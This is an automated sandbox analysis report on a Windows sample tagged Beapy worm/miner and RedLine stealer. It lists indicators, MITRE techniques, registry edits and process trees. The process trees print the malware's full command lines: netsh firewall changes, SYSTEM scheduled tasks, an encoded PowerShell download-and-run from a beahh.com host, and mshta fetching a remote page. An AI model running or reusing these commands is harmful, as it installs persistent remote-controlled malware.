beapy | c1a85afd7acdaf7ab0d6839cc68d67ca75455fa9fb3d62a95f6579f07899df49

Resubmissions

05-04-2021 09:29

210405-8ga7y7zk36 10

03-04-2021 06:00

210403-gtexn6kycs 10

Analysis

max time kernel
301s
max time network
302s
platform
windows7_x64
resource
win7v20201028
submitted
05-04-2021 09:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setup[1].exe
Size

1.3MB
MD5

0657125b7850a7b5796bf6979da502f0
SHA1

686d1ad201f0706daec7dd9bfa60fd1144a7b876
SHA256

c1a85afd7acdaf7ab0d6839cc68d67ca75455fa9fb3d62a95f6579f07899df49
SHA512

879167e0b34e015e62828151a05b785f3f9b99e2826be73fe9afc4d671dedec19c9994d2481c060e453367885ba16cce0252e7049bdb59c5ee90885f6527e10c

Score

10^/10

beapy redline 010402 evasion infostealer miner pyinstaller worm

Malware Config

Extracted

Family

redline

Botnet

010402

194.135.20.72:3214

Signatures

Beapy
Beapy is a python worm with crypto mining capabilities.
miner worm beapy
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 3 IoCs

resource	yara_rule
behavioral1/memory/1084-84-0x0000000000400000-0x0000000000430000-memory.dmp	family_redline
behavioral1/memory/1084-85-0x000000000042977E-mapping.dmp	family_redline
behavioral1/memory/1084-87-0x0000000000400000-0x0000000000430000-memory.dmp	family_redline

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Executes dropped EXE 2 IoCs

pid	Process
320	hqLA.exe
1752	hqLA.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Loads dropped DLL 19 IoCs

pid	Process
1752	hqLA.exe
1752	hqLA.exe
1752	hqLA.exe
1752	hqLA.exe
1752	hqLA.exe
1752	hqLA.exe
1752	hqLA.exe
1752	hqLA.exe
1752	hqLA.exe
1752	hqLA.exe
1752	hqLA.exe
1752	hqLA.exe
1752	hqLA.exe
1752	hqLA.exe
1752	hqLA.exe
1752	hqLA.exe
1752	hqLA.exe
1752	hqLA.exe
1752	hqLA.exe

Drops file in System32 directory 13 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c291b9b0-b5aa-4d49-8320-444a580f8c40	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7bd9b797-7a76-4920-b8d0-f22a652b3ccc	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_64ce8339-6b95-43e0-8f07-5e3f294423d0	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a87914cb-e035-4944-8d5f-77d197cde3f1	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8e088925-bbb9-4dbf-b9dc-6ed322a7a7d2	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e40e2cca-02c2-4253-9484-20aa8c95aedb	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_851c9fd4-8d58-4184-85f7-81c8b3ece752	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_310614a1-6063-46da-869d-045be1041252	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4f6c43fc-7601-4f86-b68a-c3a338f0ea64	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_79b338c7-ef89-42e6-8f75-f1046055a452	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9d35177b-f716-450a-a1ec-23c8a9231b64	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 384 set thread context of 1084	384	Setup[1].exe	55

Drops file in Windows directory 13 IoCs

description	ioc	Process
File created	C:\Windows\mkatz.ini	hqLA.exe
File created	\??\c:\windows\AQzNdfKa.exe	cmd.exe
File opened for modification	\??\c:\windows\AQzNdfKa.exe	cmd.exe
File opened for modification	\??\c:\windows\dwnoz.exe	cmd.exe
File opened for modification	\??\c:\windows\aAKrYQe.exe	cmd.exe
File opened for modification	\??\c:\windows\hqLA.exe	cmd.exe
File created	C:\Windows\m2.ps1	hqLA.exe
File created	\??\c:\windows\DuooWvQ.exe	cmd.exe
File opened for modification	\??\c:\windows\DuooWvQ.exe	cmd.exe
File opened for modification	\??\c:\windows\DuooWvQ.exe	cmd.exe
File created	\??\c:\windows\dwnoz.exe	cmd.exe
File created	\??\c:\windows\aAKrYQe.exe	cmd.exe
File created	\??\c:\windows\hqLA.exe	cmd.exe

Detects Pyinstaller 7 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x00030000000130e4-19.dat	pyinstaller
behavioral1/files/0x00030000000130e4-21.dat	pyinstaller
behavioral1/files/0x00030000000130e4-23.dat	pyinstaller
behavioral1/files/0x00050000000130e1-123.dat	pyinstaller
behavioral1/files/0x00050000000130e1-137.dat	pyinstaller
behavioral1/files/0x00040000000130e2-142.dat	pyinstaller
behavioral1/files/0x00050000000130e1-163.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1968	schtasks.exe
1748	schtasks.exe
1660	schtasks.exe
512	schtasks.exe
2876	schtasks.exe
1240	schtasks.exe
1004	schtasks.exe
2328	schtasks.exe
3084	schtasks.exe
3168	schtasks.exe
1000	schtasks.exe
3300	schtasks.exe
1636	schtasks.exe
1624	schtasks.exe
1708	schtasks.exe
2212	schtasks.exe
2228	schtasks.exe
2188	schtasks.exe

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
956	ipconfig.exe
1040	ipconfig.exe
596	netstat.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	cmd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	WScript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WScript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	cmd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	WScript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	WScript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 60a205bf0f2ad701	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WScript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	WScript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	cmd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	WScript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	WScript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{35786D3C-B075-49B9-88DD-029876E11C01} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 010000000000000000ff6f850f2ad701	WScript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	WScript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	WScript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{B155BDF8-02F0-451E-9A26-AE317CFD7779} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 0100000000000000606b85850f2ad701	WScript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	WScript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	WScript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	WScript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WScript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	cmd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	WScript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WScript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	WScript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	cmd.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
1988	powershell.exe
1988	powershell.exe
384	Setup[1].exe
384	Setup[1].exe
384	Setup[1].exe
1988	powershell.exe
1988	powershell.exe
1988	powershell.exe
1988	powershell.exe
1988	powershell.exe
1752	hqLA.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

description	pid	Process
Token: SeAssignPrimaryTokenPrivilege	2020	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2020	WMIC.exe
Token: SeSecurityPrivilege	2020	WMIC.exe
Token: SeTakeOwnershipPrivilege	2020	WMIC.exe
Token: SeLoadDriverPrivilege	2020	WMIC.exe
Token: SeSystemtimePrivilege	2020	WMIC.exe
Token: SeBackupPrivilege	2020	WMIC.exe
Token: SeRestorePrivilege	2020	WMIC.exe
Token: SeShutdownPrivilege	2020	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2020	WMIC.exe
Token: SeUndockPrivilege	2020	WMIC.exe
Token: SeManageVolumePrivilege	2020	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2020	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2020	WMIC.exe
Token: SeSecurityPrivilege	2020	WMIC.exe
Token: SeTakeOwnershipPrivilege	2020	WMIC.exe
Token: SeLoadDriverPrivilege	2020	WMIC.exe
Token: SeSystemtimePrivilege	2020	WMIC.exe
Token: SeBackupPrivilege	2020	WMIC.exe
Token: SeRestorePrivilege	2020	WMIC.exe
Token: SeShutdownPrivilege	2020	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2020	WMIC.exe
Token: SeUndockPrivilege	2020	WMIC.exe
Token: SeManageVolumePrivilege	2020	WMIC.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	384	Setup[1].exe
Token: SeDebugPrivilege	1084	Setup[1].exe
Token: SeDebugPrivilege	596	netstat.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1728 wrote to memory of 1528	1728	wsFeJZkc.exe	30
PID 1728 wrote to memory of 1528	1728	wsFeJZkc.exe	30
PID 1728 wrote to memory of 1528	1728	wsFeJZkc.exe	30
PID 1728 wrote to memory of 1528	1728	wsFeJZkc.exe	30
PID 1528 wrote to memory of 464	1528	cmd.exe	32
PID 1528 wrote to memory of 464	1528	cmd.exe	32
PID 1528 wrote to memory of 464	1528	cmd.exe	32
PID 1528 wrote to memory of 464	1528	cmd.exe	32
PID 464 wrote to memory of 788	464	WScript.exe	33
PID 464 wrote to memory of 788	464	WScript.exe	33
PID 464 wrote to memory of 788	464	WScript.exe	33
PID 464 wrote to memory of 788	464	WScript.exe	33
PID 788 wrote to memory of 840	788	cmd.exe	35
PID 788 wrote to memory of 840	788	cmd.exe	35
PID 788 wrote to memory of 840	788	cmd.exe	35
PID 788 wrote to memory of 840	788	cmd.exe	35
PID 788 wrote to memory of 808	788	cmd.exe	37
PID 788 wrote to memory of 808	788	cmd.exe	37
PID 788 wrote to memory of 808	788	cmd.exe	37
PID 788 wrote to memory of 808	788	cmd.exe	37
PID 788 wrote to memory of 1636	788	cmd.exe	38
PID 788 wrote to memory of 1636	788	cmd.exe	38
PID 788 wrote to memory of 1636	788	cmd.exe	38
PID 788 wrote to memory of 1636	788	cmd.exe	38
PID 788 wrote to memory of 1624	788	cmd.exe	39
PID 788 wrote to memory of 1624	788	cmd.exe	39
PID 788 wrote to memory of 1624	788	cmd.exe	39
PID 788 wrote to memory of 1624	788	cmd.exe	39
PID 788 wrote to memory of 1000	788	cmd.exe	40
PID 788 wrote to memory of 1000	788	cmd.exe	40
PID 788 wrote to memory of 1000	788	cmd.exe	40
PID 788 wrote to memory of 1000	788	cmd.exe	40
PID 2004 wrote to memory of 320	2004	taskeng.exe	42
PID 2004 wrote to memory of 320	2004	taskeng.exe	42
PID 2004 wrote to memory of 320	2004	taskeng.exe	42
PID 2004 wrote to memory of 320	2004	taskeng.exe	42
PID 320 wrote to memory of 1752	320	hqLA.exe	44
PID 320 wrote to memory of 1752	320	hqLA.exe	44
PID 320 wrote to memory of 1752	320	hqLA.exe	44
PID 320 wrote to memory of 1752	320	hqLA.exe	44
PID 1752 wrote to memory of 1148	1752	hqLA.exe	45
PID 1752 wrote to memory of 1148	1752	hqLA.exe	45
PID 1752 wrote to memory of 1148	1752	hqLA.exe	45
PID 1752 wrote to memory of 1148	1752	hqLA.exe	45
PID 1148 wrote to memory of 2020	1148	cmd.exe	46
PID 1148 wrote to memory of 2020	1148	cmd.exe	46
PID 1148 wrote to memory of 2020	1148	cmd.exe	46
PID 1148 wrote to memory of 2020	1148	cmd.exe	46
PID 1752 wrote to memory of 2044	1752	hqLA.exe	48
PID 1752 wrote to memory of 2044	1752	hqLA.exe	48
PID 1752 wrote to memory of 2044	1752	hqLA.exe	48
PID 1752 wrote to memory of 2044	1752	hqLA.exe	48
PID 2044 wrote to memory of 1972	2044	cmd.exe	49
PID 2044 wrote to memory of 1972	2044	cmd.exe	49
PID 2044 wrote to memory of 1972	2044	cmd.exe	49
PID 2044 wrote to memory of 1972	2044	cmd.exe	49
PID 1972 wrote to memory of 576	1972	net.exe	50
PID 1972 wrote to memory of 576	1972	net.exe	50
PID 1972 wrote to memory of 576	1972	net.exe	50
PID 1972 wrote to memory of 576	1972	net.exe	50
PID 1752 wrote to memory of 1628	1752	hqLA.exe	51
PID 1752 wrote to memory of 1628	1752	hqLA.exe	51
PID 1752 wrote to memory of 1628	1752	hqLA.exe	51
PID 1752 wrote to memory of 1628	1752	hqLA.exe	51

C:\Users\Admin\AppData\Local\Temp\Setup[1].exe
"C:\Users\Admin\AppData\Local\Temp\Setup[1].exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:384
- C:\Users\Admin\AppData\Local\Temp\Setup[1].exe
  "C:\Users\Admin\AppData\Local\Temp\Setup[1].exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1084

C:\Windows\wsFeJZkc.exe
C:\Windows\wsFeJZkc.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:1728
- C:\Windows\SysWOW64\cmd.exe
  cmd /c call "c:\windows\temp\tmp.vbs"
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of WriteProcessMemory
  PID:1528
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious use of WriteProcessMemory
    PID:464
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo WjHqSrkT >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\hqLA.exe&move /y c:\windows\temp\dig.exe c:\windows\UhjnKz.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn hqLA /tr "C:\Windows\hqLA.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\mlaI" /tr "c:\windows\UhjnKz.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pTUICJFPF"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\UhjnKz.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\hqLA.exe"&schtasks /run /TN escan)
      4⤵
      Drops file in Windows directory
      Suspicious use of WriteProcessMemory
      PID:788
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add portopening tcp 65533 DNSd
        5⤵
        Modifies data under HKEY_USERS
        
        PID:840
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
        5⤵
        Modifies data under HKEY_USERS
        
        PID:808
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
        5⤵
        Creates scheduled task(s)
        
        PID:1636
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn hqLA /tr "C:\Windows\hqLA.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:1624
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\mlaI" /tr "c:\windows\UhjnKz.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:1000

C:\Windows\GoUzJnoA.exe
C:\Windows\GoUzJnoA.exe
1⤵
PID:1488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c call "c:\windows\temp\tmp.vbs"
  2⤵
  - Modifies data under HKEY_USERS
  PID:1628
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
    3⤵
    - Modifies data under HKEY_USERS
    PID:736
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo uYckTIp >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\DuooWvQ.exe&move /y c:\windows\temp\dig.exe c:\windows\CQLgUiaT.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn DuooWvQ /tr "C:\Windows\DuooWvQ.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\mayAGat" /tr "c:\windows\CQLgUiaT.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta 